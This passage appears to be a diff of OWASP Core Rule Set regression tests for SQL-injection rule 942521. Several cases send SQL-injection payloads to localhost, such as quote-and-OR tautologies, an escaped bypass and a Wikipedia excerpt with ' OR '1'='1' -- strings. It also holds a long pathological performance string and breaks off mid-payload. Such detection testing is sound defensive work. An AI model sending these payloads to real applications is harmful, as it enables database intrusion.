+ uri: "/post"
+ data: "var='%20for"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 11
 desc: "Negative test: ''or"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=''or"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-12
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=''or"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 12
 desc: "Negative test: 'books' or 'applles'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=''or"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-13
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=''or"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 13
 desc: "Negative test: bob's presentation's 'or'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=''or"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-14
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=''or"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 14
 desc: "Bypass with '''or 1"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var='''or%201"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-15
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var='''or%201"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_id: 15
 desc: "False-negative: Not detected with escapes"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=%5C'lol'%20or%20'1"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-16
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ 
method: POST + port: 80 + uri: "/post" + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 16 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20inste
ad%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20
"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-17
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20
string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 17
desc: "Performance test"
stages:
- - stage:
- 
input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60
%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%
40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21
%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%2
2.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 
"var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60
%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40
